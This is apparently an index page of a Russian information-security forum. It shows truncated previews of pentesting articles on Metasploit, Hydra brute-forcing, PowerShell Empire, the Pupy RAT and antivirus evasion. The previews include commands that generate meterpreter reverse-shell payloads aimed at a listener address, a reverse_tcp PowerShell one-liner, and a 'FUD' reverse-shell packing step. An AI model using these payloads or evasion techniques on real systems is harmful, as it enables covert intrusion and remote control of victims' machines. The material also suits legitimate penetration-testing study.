Форум информационной безопасности - yg140.servegame.com

Обзор свойств Metasploit Community

  • 4 748
  • 1

Этот раздел охватывает следующие темы:​
  • Обзор свойств
  • Панель инструментов
  • Навигационный обзор
  • Административный обзор
  • Обзор свойств
Обзор свойств Metasploit Community

Metasploit Community предоставляет полное и понятное рабочее пространство, которое вы можете использовать, как для выполнения административных заданий, так и для настройки тестов на проникновение.​

Панель инструментов

Панель инструментов предоставляет доступ к быстрым заданиям и отображает общие сведения о проекте. Общие сведения о проекте показывают классификацию обнаруженных хостов, открытые и закрытые...​

Статья THC-Hydra инструкция для чайников

  • 37 805
  • 5
C
Hydra нельзя отнести к простым и легко дающимся новичкам. Не надо отчаиваться, если вам не удалось оседлать hydra, я рекомендую вам посмотреть на программу BruteX. Она автоматизирует процесс подбора, более того, она использует ту же самую hydra, но сама вводит необходимые ключи и не нужно искать файлы с именами и паролями, поскольку они поставляются вместе с программой.

ПРОТОКОЛ — это протокол, который вы хотите атаковать, например, ftp, smtp, http-get или любой из доступных: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 и v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC и XMPP.

ОПЦИИ Hydra
Код:
  -R        восстановить предыдущую прерванную/оборванную сессию
  -S        выполнить SSL соединение
  -s ПОРТ   если служба не на порту по...

Статья Обзор Metasploit Community

  • 5 804
  • 0

Этот раздел охватывает следующие темы:
  • Обзор продукта
  • Компоненты Metasploit Community
  • Службы Listener
  • Реализация Metasploit
  • Общая терминология Metasploit
  • Рабочий процесс Metasploit
  • Поддерживаемые браузеры
  • Поддержка целей IPv6
Обзор продукта Metasploit Community

Metasploit Community – комплексный эксплуатационный инструмент, который помогает вам разделить поток пентестинга на меньшие и более управляемые задачи. При помощи Metasploit Community вы можете использовать силу Фреймворка Metasploit и базу данных его эксплойтов через пользовательский интерфейс созданной сети для выполнения оценки безопасности и проверки уязвимости.

Metasploit Community автоматизирует процесс обнаружения и эксплуатации, а также обеспечивает вас...​

Статья Metasploit Community – руководство пользователя

  • 12 726
  • 0
Перевод: Анна Давыдова
Источник: rapid7.com
Оглавление
Целевая аудитория
Структура
Условные обозначения
Поддержка
Поддержка Metasploit Pro и Metasploit Express
Поддержка Metasploit фреймворк и Metasploit Community​
Обзор продукта
Компоненты Metasploit Community

Фреймворк Metasploit
Сервисы
Модули
Интерфейс пользователя​
Службы Listener
Реализация Metasploit
Общая терминология Metasploit

База данных
Расширенное сканирование
Эксплойт
Listener
Meterpreter
Модуль
Пэйлоад
Проект
Шелл
Код шелл
Цель
Задача
Уязвимость​
Рабочий процесс Metasploit
Поддерживаемые браузеры
Поддержка целей IPv6
...

PowerShell для хакера (часть I )

  • 37 146
  • 50
Часть 1
Следующая часть
Все части

Приветствую Вас колеги. Как Вы уже поняли речь пойдет о знакомствах с базовыми возможностями PowerShell и области применения хакерских техних.
И начнем мы пожалуй сегодня с использования скриптов PowerSploit -( скрипты написанные на PowerShell для пост эксплуатации Windows систем)

Первым примером использования PowerSploit - это будет пример простого и быстрого получения метерпретер сессии на примере скрипта Invoke-Shellcode.ps1

Для начало сходим на гитхаб по ссылке:
Код:
https://github.com/cheetz/PowerSploit/blob/master/CodeExecution/Invoke--Shellcode.ps1
1.PNG


Жмакним на клавишу RAW - что бы получить ссылку для скачивания в чистом виде
Код:
https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1
Эту ссылку мы потом используем для нашей...

Статья Знакомство с PowerShell Empire Framework

  • 54 972
  • 93
И так привет колеги. Сегодня я хотел бы немного Вас ознакомить с прекрасным ,по моему скромному мнению, продуктом PowerShell Empire Framework.

PowerShell Empire Framework - это агент для пост эксплуатации windows систем,написанный полностью на павершеле (серверная часть на питона а клиентская на павершеле,по этому легко поднять серверную часть на том же Kali Linux) и имеет в себе огромный функционал. Как я заметил что помимо того , что он используется для пост эксплуатации ( повышение привилегий, закрепленния в системе) он активно так очень используется и для активного фишинга,обхода антивируса и эксплуатации уязвимостей и одна из главных фишок - отлично используется для атак на Домен Контролеры. Конечно я все это хочу вам рассказать))) но сегодня мы слегка ознакомимся с интерфейсом фреймворка и базовы самые моменты)

Вобщем поехали)
Первым делом качаем:
Код:
git clone https://github.com/adaptivethreat/Empire.git
Запускаем

Смотрим help

2.PNG


Как и в любой клиент серверной программе сначала нам...

Статья Обход антивируса с помощью ctypes (python)

  • 12 632
  • 8
Привет колеги.
Сегодня покажу очень простенький пример обхода антивируса с помощью библиотеки ctypes в языке программирования python.
Суть обхода в том эта библиотека дает нам возможность выполнять код C|C++ в питоновском скрипте.
И мы смело сможем запустить шеллкод метасплоита в оперативной памяти.

Вы уж простите много писать пока не буду,времени очень мало у меня,отпишу потом пояснения в коментариях если возникнут вопросы у кого то .))

Вообщем ближе к делу

И так проделываем следующие шаги:
1)Создаем шеллкод командой:
Код:
msfvenom -p windows/meterpreter/reverse_https lport=1337 lhost=192.168.137.137 -b \0x0a\0x0b\0xff -f c
2.jpg

тут ничего пояснять думаю не нужно ,лишь обратить внимания стоит на параметр -b которым мы указываем которые плохие символы в шеллкоде нужно не использовать.

Дальше создаем скрипт на питоне следуещого вида:

Код:
from ctypes import *

shellcode = ("Тут_копипастим_наш шеллкод_созданный_через_msf_venom");

tralivali =...

Статья Быстрый способ получить meterpreter

  • 40 224
  • 33
Привет колеги. )
Сегодня речь пойдет непосредственно о пост эксплуатации скомпрометированной системы
(когда у нас есть командная строка удаленной windows машины от windows 7) и нам нужно расширить функционал своих возможностей с помощью метерпретер сессии метаслоита.

Для этого нам отлично подойдет тулза от trustedsec ,которая носит названия Magic Unicorn.
Одна из ее возможностей - это создания команды для PowerShell ,что есть доверенным приложением Windows.

Вообщем ближе к делу.
Качаем:
Код:
git clone https://github.com/trustedsec/unicorn.git
1.png

Запускаем.Смотрим help.
2.jpg

Выполняем команду
Код:
python unicorn.py windows/meterpreter/reverse_tcp 192.168.137.137 443
3.png

Получаем два интересных нам файла...

PUPY Remote Administration Tool (RAT)

  • 17 321
  • 24
Сегодня посмотрим ,на мой взгляд , довольно таки не плохой мультиплатформенный RAT на питоне c очень большим функционалом.

Pupy может использовать различные протоколы шифрования для комуникации с жертвой (SSL,HTTP,RSA,obfs3,scramblesuit), мигрировать в процессы (reflective injection), подгружать удаленные python скрипты, python пакеты и python C-extensions из оперативной памяти.
Pupy может создавать payloads в различных форматах ,таких как PE executables, reflective DLLs, python files, powershell, apk, ...

После тестирования данного продукта мне он напомнил что то общее между meterpreter и модулями из PowerShell Empire Framework ,как интерфейсом так и модулями которые разработчики вложили в сей продукт.

Я считаю что его можно отлично использовать для:
  • security research...

Статья Обход антивируса (Reverse Python Shell) 100% FUD

  • 18 832
  • 41
Привет.С вами DarkNode )
Сегодня будем обходить антивирус через Python Reverse TCP Shell.
ТОЛЬКО ПОСЛЕ ПРОЧТЕНИЯ НЕ ВЗДУМАЙТЕ ***** СЛИВАТЬ БИНАРНИК НА ВТ (ВирусТотал)

Итак наткнулся на гитхабе на прикольную реалиазацию reverse_tcp_shell через планировщик задач с использованием XML темплейта)
Довольно таки прикольно имхо)

Состоит наш бэкдор опять же таки из двух частей:

Серверная часть
:
  • reverse_tcp.py - вредоносный питоновоский скрипт ,который запускается на стороне жертвы
  • может быть упакован в "exe" файл используя pyinstaller
На windows машине , выполните команду:
Код:
pyinstaller --noconsole --onefile --icon=iconfile.ico reverse_tcp.py
для упаковки в бинарный файл.

listener.js
Простенький мультиклиентный листенер написанный на javascript(node.js)
Команды:
help
exit ...
🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

Пользователи онлайн

Статистика форума

Темы
51 030
Сообщения
344 819
Пользователи
148 575
Новый пользователь
hopeless_ms